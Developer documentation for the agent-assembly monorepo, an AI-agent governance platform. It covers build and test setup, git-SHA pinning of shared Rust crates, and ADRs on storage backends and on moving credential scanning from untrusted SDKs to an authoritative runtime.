Last updated: 2026-06-07 by Chisanan232

Local Development

This page covers the from-clone development loop for the agent-assembly monorepo. For contribution conventions (commit style, PR process) see CONTRIBUTING.md.

Prerequisites

Rust stable (≥ 1.75) via rustup
protoc — Protocol Buffers compiler (brew install protobuf / apt-get install protobuf-compiler); required by the aa-proto and aa-gateway build scripts
cargo-nextest, cargo-deny, and Lefthook
Linux only for the proxy / eBPF layers — see Supported platforms.

Bootstrap

git clone https://github.com/ai-agent-assembly/agent-assembly.git
cd agent-assembly

# Installs toolchains, clones the SDK polyrepos as siblings, installs git
# hooks, and builds the workspace.
make dev-setup

# Smoke-tests each SDK repo in parallel, then checks gateway health.
make dev-verify

Everyday loop

cargo build --workspace --exclude aa-ebpf   # build (skip the BPF-target crate off Linux)
cargo nextest run --workspace               # full test suite
cargo nextest run -p aa-core                # one crate
cargo fmt --all                             # format
cargo clippy --all-targets -- -D warnings   # lint
cargo deny check                            # dependency / license audit

The eBPF crates compile with a target-specific toolchain; on non-Linux hosts cargo check -p aa-ebpf is sufficient.

Git hooks

Hooks are managed by Lefthook (lefthook.toml). Install them once with lefthook install. The pre-commit hook runs fmt, clippy, and deny scoped by file glob; the pre-push hook runs cargo doc --workspace --no-deps.

Running locally

Point the gateway at a bundled reference policy and connect a sidecar:

cargo run -p aa-gateway -- --policy policy-examples/low-risk.yaml

See the CLI page for aasm operator commands and the README “Running with Docker Compose” section for the sidecar stack.

Troubleshooting

Symptom	Cause	Fix
`protoc` / “Could not find protoc” build error	Protocol Buffers compiler missing	Install it (`brew install protobuf` or `apt-get install protobuf-compiler`) — `aa-proto` and `aa-gateway` need it
`cargo build` fails on `aa-ebpf*` off Linux	eBPF crates target the BPF toolchain	Build with `--exclude aa-ebpf`; use `cargo check -p aa-ebpf` on non-Linux hosts
Pre-commit hook does not run	Lefthook hooks not installed	Run `lefthook install` once in the repo
Pre-push fails on `cargo doc`	A doc comment has a broken intra-doc link	Run `cargo doc --workspace --no-deps` locally and fix the reported link
`make dev-verify` skips the Go smoke test	`go-sdk` checkout is missing or has no `internal/smoke/`	Expected when the Go SDK sibling repo is absent; clone it next to `agent-assembly` to enable it

Last updated: 2026-06-11 by Chisanan232

Consuming the Shared Crates

The thin per-language SDK shims live in their own repositories (python-sdk, node-sdk) but reuse Rust crates that are developed in this monorepo. Four crates are consumed from outside the workspace:

Crate	Role in the SDK shim
`aa-core`	wire types and traits
`aa-proto`	generated protobuf / gRPC wire types
`aa-security`	advisory, non-authoritative credential preflight
`aa-sdk-client`	UDS transport, IPC codec, `AssemblyClient` lifecycle

Distribution mechanism: git SHA pin

The chosen distribution mechanism is a git SHA pin, not a registry publish. The rationale (crates.io was rejected; a bare branch name does not resolve once a crate consumes the dependency, so a full SHA is required) is recorded in ADR 0002 — SDK Security Boundary.

A consumer pins each crate to an exact commit:

[dependencies]
aa-core       = { git = "https://github.com/ai-agent-assembly/agent-assembly.git", rev = "<full-40-char-sha>", package = "aa-core", features = ["serde"] }
aa-proto      = { git = "https://github.com/ai-agent-assembly/agent-assembly.git", rev = "<full-40-char-sha>", package = "aa-proto" }
aa-security   = { git = "https://github.com/ai-agent-assembly/agent-assembly.git", rev = "<full-40-char-sha>", package = "aa-security" }
aa-sdk-client = { git = "https://github.com/ai-agent-assembly/agent-assembly.git", rev = "<full-40-char-sha>", package = "aa-sdk-client" }

Notes:

Use the full 40-character SHA, not a branch. cargo’s rev is a precise revspec; a bare branch name fails to resolve once another crate in the graph consumes the same dependency.
A git dependency checks out the whole repository, so workspace inheritance (version.workspace, [lints] workspace, dep = { workspace = true }) and the proto/ sources at the workspace root resolve transparently — the consumer does not need to reproduce any of it.
aa-sdk-client is publish = false on purpose: it is distributed only via the git pin, never to crates.io.

Regression guard

scripts/standalone-build-smoke.sh builds each of the four crates as a git-SHA-pinned consumer from a clean checkout of HEAD, outside the workspace. It runs in CI via the Crate Pinnability Smoke workflow on every pull request and master push that touches a shared crate, so a path-coupling regression — e.g. a shared crate gaining a dependency that resolves only inside the workspace checkout — fails CI here before an SDK repo hits it.

Run it locally with:

make standalone-smoke
# or
bash scripts/standalone-build-smoke.sh

Last updated: 2026-06-07 by Chisanan232

Architecture Decision Records

This directory contains Architecture Decision Records (ADRs) for agent-assembly. Each ADR documents a significant architectural choice — the context that drove the decision, the alternatives considered, and the consequences accepted.

The format follows a lightweight variant of Michael Nygard’s template. New ADRs are numbered sequentially and never rewritten; superseded decisions are recorded by adding a new ADR that links back.

Index

ADR	Title	Status
0001	Storage Architecture — SQLite (local) / PostgreSQL + TimescaleDB (production)	Accepted
0002	SDK Security Boundary, Shared-Crate Layout & Distribution	Accepted

ADR 0001: Storage Architecture — SQLite (local) / PostgreSQL + TimescaleDB (production)

Status: Accepted Date: 2026-05 Spec reference: lines 7107–7215

Context

agent-assembly needs to persist three categories of data, and the spec (lines 7113–7134) is explicit that they have fundamentally different access patterns and must not be forced into a single store:

Category	Nature	Query pattern
① Audit events — tool-call records, policy decisions, behaviour log	write-heavy, append-only, strong time-series, large volume	time-range scan, filter by `agent_id`, filter by `dry_run`
② Agent registry & config — online agents, identity, policy configuration	read-heavy, small volume, requires ACID	key lookup, simple joins
③ Metrics / aggregates — token usage, cost, event rate, anomaly data	time-series, requires fast rollup	time-series range query, rollup, window functions

The product ships in two deployment modes — Local Dev Mode (single machine, zero ops, fast feedback loop) and Production (multi-instance gateway behind a load balancer, durable retention, compliance evidence) — and a single backend cannot serve both well.

Without a deliberate decision recorded here, two failure modes become likely as Epic 18 lands:

Future contributors encountering sqlite.rs and postgres.rs side by side propose replacing one to “simplify”; the asymmetric requirements of the two deployment modes are not visible from the code alone.
A contributor reading “time-series workloads at thousands of events per second” reaches for Cassandra by reflex without seeing that the agent-registry ACID requirement and the operational cost rule it out at current scale.

Decision

Concern	Choice
Local Dev Mode storage	SQLite (single file at `~/.aasm/local.db`, WAL journal mode)
Production storage	PostgreSQL 15+ with the TimescaleDB 2.x extension
Policy hot-path cache	Redis 7+, optional, off by default; enable only when policy-eval latency becomes measurable
Wide-column / NoSQL audit store	Not used (see Why not Cassandra below)
Backend abstraction	A single `StorageBackend` trait in `aa-gateway/src/storage/`; both SQLite and Postgres implement it; business logic depends only on the trait
Compression / retention for warm data	TimescaleDB native column-store compression (production); manual rolling-delete (local dev)

The StorageBackend trait surface, configuration schema, retention-policy structure, and environment-variable overrides are defined in Epic AAASM-1569.

Storage Stack

Local Dev Mode

SQLite (single file: ~/.aasm/local.db, journal_mode = wal)
  ├── Audit events      — table with (ts, agent_id) index
  ├── Agent registry    — table
  ├── Policy versions   — table (BLOB for the YAML/JSON document)
  └── Metrics           — in-memory aggregation only; not persisted
                          (dev does not need historical trends)

Rationale: zero external dependencies, single process, single user. A developer can open the file in any SQLite browser. Performance is sufficient because dev volumes do not approach the multi-writer or multi-machine ceiling.

Production (Self-hosted / SaaS)

PostgreSQL 15+
  + TimescaleDB 2.x extension     (same Postgres instance, single connection pool)
    ├── audit_events  (hypertable, chunk_interval = 7 days,
    │                  compression policy = 30 days)
    ├── metrics       (hypertable, chunk_interval = 1 day)
    ├── agent_registry  (standard table, JSONB metadata column)
    └── policy_versions (standard table, JSONB document column)

Redis 7+                          (optional; enable when measured needed)
  ├── Policy cache (TTL: 30s)     — hot-path policy decisions
  ├── Session state               — approval queue, pending decisions
  └── Rate-limit counters         — per-agent, per-team

Rationale: PostgreSQL alone handles the registry and policy store cleanly (ACID, JSONB for flexible schema, async-native via sqlx). TimescaleDB is a PostgreSQL extension — not a separate system — so it adds time-series partitioning and compression to the same instance with negligible operational overhead. Redis stays opt-in because policy-eval latency is acceptable straight from Postgres at current scale.

Alternatives Considered

Cassandra (rejected)

Cassandra is appropriate for workloads with extremely high sustained write volume, multi-region geo-distribution, and a tolerance for eventual consistency (the Netflix-scale event-stream archetype). It is the wrong fit here because:

ACID is required for the agent registry. Registry mutations (agent online / offline, identity rotation, enforcement-mode change) must be linearizable; an eventually-consistent registry produces visible correctness bugs — for example, an agent that is “offline” in one node’s view and “online” in another’s, racing policy evaluations against itself.
Current scale is far below Cassandra’s sweet spot. Early production deployments are in the low-thousands-of-events-per-second range; PostgreSQL + TimescaleDB handles this comfortably on commodity hardware.
Operational complexity is disproportionate. Cassandra demands cluster sizing, repair scheduling, compaction tuning, and tombstone management. For a small operating team, this overhead is not justified by any benefit at the current data volume.
No reuse of existing investment. Postgres expertise, sqlx integration, and the same TimescaleDB hypertable cover the time-series workload without introducing a second data system.

MongoDB (rejected)

Considered for the agent registry and policy store because of the JSON-document schema flexibility. Rejected because:

PostgreSQL’s JSONB column type covers the same flexible-schema use case (indexed, queryable, schema-evolution-friendly) without introducing a second data system to operate.
Strict ACID semantics for the registry are stronger in Postgres than in MongoDB’s default replication model.
Splitting “events go to one DB, registry goes to another” complicates joins (for example, listing audit events grouped by registered-agent metadata) that PostgreSQL handles trivially.

Single SQLite for production (rejected)

Considered for symmetry with Local Dev Mode. Rejected because:

SQLite has no network protocol; a multi-instance gateway cannot share a single database file safely.
SQLite’s single-writer model becomes a hard bottleneck for the audit-event write rate seen in production.
WAL mode improves concurrent reads but does not address the multi-machine or multi-writer requirement.
Backup, replication, and point-in-time recovery — table-stakes in production — are not first-class in SQLite.

PostgreSQL alone (without TimescaleDB) (rejected)

Plain PostgreSQL is viable for the registry and policy store, but for audit_events:

Time-bucketed query patterns degrade as the table grows; manual partition management is error-prone.
Compression of old data requires an external tool or a custom ETL job.
TimescaleDB provides both (hypertable partitioning + native compression) as PostgreSQL extensions, so adopting it costs only an extension install — no separate process or operational target.

Since TimescaleDB is strictly additive (compatible with the rest of the Postgres schema and tooling), there is no reason to defer it.

Consequences

Positive

Zero external dependencies for local development. A first-time contributor can run the gateway and immediately have a working, persistent store.
Production-grade time-series performance via TimescaleDB hypertables and compression policies, without standing up a separate data system.
Business logic stays storage-agnostic. All gateway code talks to the StorageBackend trait; swapping backends is a configuration change, not a code change.
Compression and retention come for free in production via TimescaleDB compression policies; the application-level apply_retention only handles tier transitions (warm → cold archive or drop).
Compliance posture is clean (GDPR, SOC 2 Type II, ISO 27001): retention is operator-configurable and audit-event durability is guaranteed once the row commits.

Negative / Accepted trade-offs

Two backend implementations to maintain. The CI matrix must cover both SQLite and PostgreSQL. The StorageBackend trait constrains this cost: feature parity is enforced at compile time.
TimescaleDB extension is an operational requirement for production PostgreSQL deployments. Managed-PG offerings (Aiven, Timescale Cloud, RDS with the extension available) cover this; self-hosted operators must install the extension package.
Redis adds a moving part when enabled. The optional, off-by-default flag keeps it out of the dependency surface until measured latency justifies it.
Local-dev and production semantics differ slightly (for example, no compression in SQLite). The differences are documented in the gateway config reference and reflected in aasm status output.

Spec Reference

Spec lines	Topic
7107–7215	Complete storage architecture discussion (Q&A format)
7113–7134	Three data categories and their access patterns
7140–7155	Local Dev Mode storage stack (SQLite)
7157–7191	Production storage stack (PostgreSQL + TimescaleDB)
7165–7172	“Why not Cassandra” rationale
7175–7213	Recommended complete storage stack + hot / warm / cold tiering
7213	Architecture decision (one-sentence conclusion)
7215	Spec recommendation that this decision be recorded as an ADR

Epic: AAASM-1569 — Durable Persistence Layer (this ADR is its S-L deliverable)
Story: AAASM-1593 — ADR 0001 story ticket
All E18 implementation stories (StorageBackend trait, SQLite backend, PostgreSQL backend, migration runner, retention engine, etc.) implement the decision recorded here.

Last updated: 2026-05-21 by Chisanan232

ADR 0002: SDK Security Boundary, Shared-Crate Layout & Distribution

Status: Accepted Date: 2026-06 Epic: AAASM-2552

Amendment (AAASM-2703 / AAASM-2704, 2026-06) — the original decision below kept aa-ffi-go in the monorepo as a staticlib artifact. That has been reversed for consistency: the thin Go shim now lives in the go-sdk repo (native/aa-ffi-go/) as a thin C-ABI over the git-SHA-pinned aa-sdk-client, exactly like the Node/Python shims. The monorepo no longer hosts any FFI shim (AAASM-2703 removed aa-ffi-go; AAASM-2704 vendored it into go-sdk).

Context

Two problems in the SDK / FFI layer were audited on 2026-06-05 and must be resolved together, because the fix for one constrains the other.

1. Security enforcement is in the wrong place

CredentialScanner (in aa-core/src/scanner.rs) is the credential-detection/redaction primitive. Today it runs:

Location	Trusted?	Authoritative?
`aa-gateway` (`audit.rs`, `engine/mod.rs`)	yes (server)	yes
`aa-proxy` (`intercept/`, `audit_jsonl.rs`)	yes (sidecar)	yes
`aa-ffi-python` (`src/handle.rs`)	no — in the SDK binding	it is the only scan on the SDK fast-path
`aa-runtime`	yes (trusted)	no — it does not scan or redact at all

The SDK event fast-path is SDK → UDS → aa-runtime → gRPC → gateway. aa-runtime is the mandatory chokepoint, but its pipeline is only enrich → is_policy_violation (blocked_actions) → forward/batch — it forwards the SDK’s payload without independently scanning or redacting it. Therefore a removed or bypassed SDK scanner lets raw secrets flow SDK → runtime → gateway, where the only remaining guard is the gateway’s narrower banned-key sanitizer. The SDK is being trusted as a security boundary, and it must not be.

2. The FFI bindings are duplicated and diverged

The bindings are reimplemented per language rather than sharing one implementation:

Binding	Form	Shared-crate use
`agent-assembly/aa-ffi-python`	1,357 lines (`codec/config/detect/handle/hooks/ipc/lib`), `path` deps	in-workspace
`python-sdk/rust/aa-ffi-python`	719-line `lib.rs`, imports `aa_core` + `aa_proto`	git-SHA-pinned (`rev = ed4aa11a…`)
`node-sdk/native/aa-ffi-node`	178 lines, imports no `aa_*` crate	none — reimplemented
`go-sdk/internal/ffi`	Go cgo consumer of the `aa-ffi-go` staticlib	consumes a built artifact

The Node binding diverged precisely because it shares no code with the Python one — nothing forces it to track the same logic. Go originally kept one Rust artifact in the monorepo, consumed by the language (later revised — see the amendment at the top: the Go shim now lives in go-sdk alongside the others).

Decision

Concern	Choice
Is the SDK a security boundary?	No. The SDK is untrusted.
Authoritative enforcement point	`aa-runtime` — scans, redacts, and normalizes every event before forward/audit, unconditionally.
Source of truth	gateway / control-plane (policy SoT; audit-write sanitizer kept as final backstop).
SDK-side detection	Best-effort advisory preflight only. No `clean` / `already_scanned` marker exists on the wire, and none is honored.
Security primitives home	A new `aa-security` crate (scanner, redaction, audit-normalization) — moved out of `aa-core`.
Shared runtime-client home	A new `aa-sdk-client` crate (UDS transport, proto codec, `AssemblyHandle` lifecycle, event shipping, advisory preflight).
Per-language bindings	Thin pyo3 / napi / cgo shims over `aa-sdk-client`: ergonomic API, hooks, type translation, event capture — no security authority.
Dependency direction	`aa-runtime, aa-gateway, aa-proxy, aa-sdk-client → aa-security` (security logic is not in `aa-core`).
Shared-crate distribution	git SHA pin (see below).

Trust model

UNTRUSTED                    TRUSTED ENFORCEMENT                 SOURCE OF TRUTH
Python/Node/Go SDK   ──UDS──▶ aa-runtime (mandatory chokepoint) ──gRPC──▶ gateway / control-plane
 • ergonomic API              • scan   (authoritative)                   • policy SoT
 • hooks, event capture       • redact (before forward + audit)          • audit-write sanitizer
 • type translation           • policy / approval (already server-side)    (final backstop)
 • BEST-EFFORT preflight      • normalize; re-scans EVERYTHING, always
   (advisory only)

Invariant: nothing the SDK asserts can shorten the runtime’s work. The runtime scans unconditionally; aa-security running inside the SDK is advisory, the same crate running inside aa-runtime is authoritative. Position — not code — confers authority.

Crate topology

Crate	Role	Authority
`aa-security` (new)	scanner / redactor / normalization primitives	none (library)
`aa-core`	wire types, traits	none
`aa-sdk-client` (new)	UDS transport, proto codec, `AssemblyHandle`, event shipping, advisory preflight	none
`aa-runtime`	authoritative scan / redact / normalize + policy / approval	✅ the boundary
`aa-gateway`	policy SoT + audit-write sanitizer (final backstop)	✅ SoT
`aa-ffi-{python,node,go}`	thin pyo3 / napi / cgo shims	none

Canonical bindings (resolved)

Python: python-sdk/rust/aa-ffi-python (the git-pinned SDK consumer) is canonical; the monorepo agent-assembly/aa-ffi-python is the duplicate to retire. The two differ in size (719 vs 1,357 lines), so the shared logic must be reconciled into aa-sdk-client by diffing both — not by lifting either copy wholesale.
Node: node-sdk/native/aa-ffi-node is the only Node binding, but it shares no code with the core (imports no aa_* crate). It is re-pointed onto aa-sdk-client, which makes the drift structurally impossible.
Go: (revised by AAASM-2703 / AAASM-2704) aa-ffi-go is relocated into the go-sdk repo (native/aa-ffi-go/) as a thin C-ABI shim over the git-SHA-pinned aa-sdk-client, mirroring Node/Python — the monorepo no longer hosts it.

Distribution mechanism: git SHA pin

The shared crates (aa-core, aa-proto, and the new aa-security, aa-sdk-client) are consumed by the SDK repos via git dependency pinned to an exact commit SHA. This is already the established, in-production pattern — python-sdk/rust/aa-ffi-python/Cargo.toml already declares:

aa-core  = { git = "https://github.com/ai-agent-assembly/agent-assembly.git", rev = "ed4aa11a…", package = "aa-core", features = ["serde"] }
aa-proto = { git = "https://github.com/ai-agent-assembly/agent-assembly.git", rev = "ed4aa11a…", package = "aa-proto" }

The decision is to extend this same mechanism to aa-security and aa-sdk-client, not to introduce a new one.

Migration order (boundary-first, gated)

The Epic executes in this order so SDK-side scanning is never removed before the runtime is authoritative:

This ADR.
Extract aa-security (move scanner/redaction/normalization out of aa-core; temporary re-export for compat).
[GATE] aa-runtime authoritative scan/redact/normalize stage + guardrails.
SDK-bypass resistance test suite (proves the gate).
Make the shared crates pinnable.
Extract aa-sdk-client.
Node SDK → thin shim. 8. Python SDK → thin shim. 9. Remove fat aa-ffi-* from the workspace.

Steps 6–9 (anything that removes SDK-side scanning) are blocked on step 3.

Alternatives Considered

Trust SDK-side scanning (rejected)

Treating the SDK as the scan boundary is the current accidental state. Rejected: the SDK is attacker-controllable (a bypassed, modified, or simply outdated SDK), so any guarantee anchored there is not a guarantee. Security must hold even when the SDK does nothing.

Keep security primitives in `aa-core` (rejected)

aa-core is depended on by everything, including the thin shims and storage drivers. Hosting the scanner there enlarges the security-review blast radius to the whole base crate and forces unrelated consumers to pull it in. A small, dedicated aa-security crate gives a reviewable surface and a clean dependency direction.

Per-language reimplementation / pure-language transport (rejected)

Letting each SDK speak UDS + protobuf natively (no shared Rust) is internally coherent, but it reproduces the transport logic N times. The current divergence (Python rich, Node reinvented, no shared types) is exactly this failure mode realized halfway — paying the native-build cost and duplicating. One shared aa-sdk-client removes the duplication while keeping the shims idiomatic.

Publish shared crates to crates.io / a private registry (rejected)

A registry would enable prebuilt-artifact reuse, but crates.io publishing was already attempted and dropped (AAASM-2338), and it adds a publish pipeline plus version-bump discipline. git-SHA pinning is already working in python-sdk, requires no new infrastructure, and pins to an exact, reproducible commit. (cargo’s rev must be a SHA, not a bare branch name, or resolution fails once a crate consumes the dependency.)

Keep the bindings in the monorepo workspace (rejected for ownership)

Keeping aa-ffi-* in the workspace preserves atomic cross-crate changes, but couples each SDK’s release to the monorepo and keeps the FFI dep trees (pyo3/napi/prost/tokio) in the core build. Moving the thin shims into their SDK repos — consuming pinned shared crates — gives the SDKs independent release cadence and shrinks the core workspace, while the shared aa-sdk-client keeps a single source of truth. Go already demonstrates the artifact-consumption variant of this model.

Consequences

Positive

The SDK can no longer weaken enforcement. Scan/redact/normalize run authoritatively at aa-runtime regardless of SDK behavior; this is proven by the bypass-resistance suite.
Drift becomes structurally impossible. One aa-sdk-client implementation, consumed by thin shims, replaces N reimplementations.
Reviewable security surface. aa-security is a small, leaf crate that the trusted enforcers depend on directly.
Smaller core build. Removing the fat bindings drops pyo3/napi/prost/tokio FFI dep trees from cargo build --workspace.
No new release infrastructure. Distribution reuses the git-SHA pin already in production.

Negative / accepted trade-offs

Authoritative scanning adds hot-path cost. Payload inspection at the runtime is more work than the current blocked_actions check; the gate Story carries explicit guardrails (precompiled scanner, secret-bearing-fields only, size caps, metrics) and must stay within the policy-latency budget.
The SDK repos rebuild the shared crates (no shared target/); org-wide CPU may rise unless sccache or prebuilt artifacts are added later.
Pinned SHAs require deliberate bumps. SDK repos pick up core changes only when their pin is advanced — an explicit, visible step rather than implicit coupling.
A temporary aa-core re-export of the moved primitives is needed during migration and must be removed once consumers are repointed.

Epic: AAASM-2552 — SDK security boundary + FFI consolidation
Story: AAASM-2558 — this ADR
Gate: AAASM-2568 — aa-runtime authoritative enforcement (blocks Stories 6–9)
Follow-on stories: AAASM-2567 (aa-security), AAASM-2570 (aa-sdk-client), AAASM-2559 (pinnable crates), AAASM-2560 / AAASM-2561 (Node / Python shims), AAASM-2562 (remove fat bindings), AAASM-2569 (bypass tests)

Last updated: 2026-06-07 by Chisanan232